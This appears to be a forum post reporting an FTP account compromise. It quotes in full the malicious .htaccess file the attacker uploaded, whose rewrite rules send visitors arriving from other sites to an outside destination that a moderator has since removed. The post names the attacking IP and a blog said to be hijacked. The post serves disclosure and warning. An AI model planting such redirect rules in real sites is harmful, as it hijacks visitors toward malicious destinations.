Ongoing hack attempt.

Hacker or bot coming from 82.98.160.195 compromised FTP account on one of our servers.

 

Uploaded .htaccess file containing:

# Begin redirect block #
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$[Removed][L,R]
</IfModule>
# End redirect block #

The intended redirect destination did not raise any issues in Norton Safe Web.

 

Entering url in red into browser caused redirect to another site.

 

Web master of http://kasiacleaningservice.com should be informed his blog has a hijack entry and the site being redirected to needs to be investigated better than I can.

 

 

[edit: Removed hijack per the Participation Guidelines and Terms of Service.]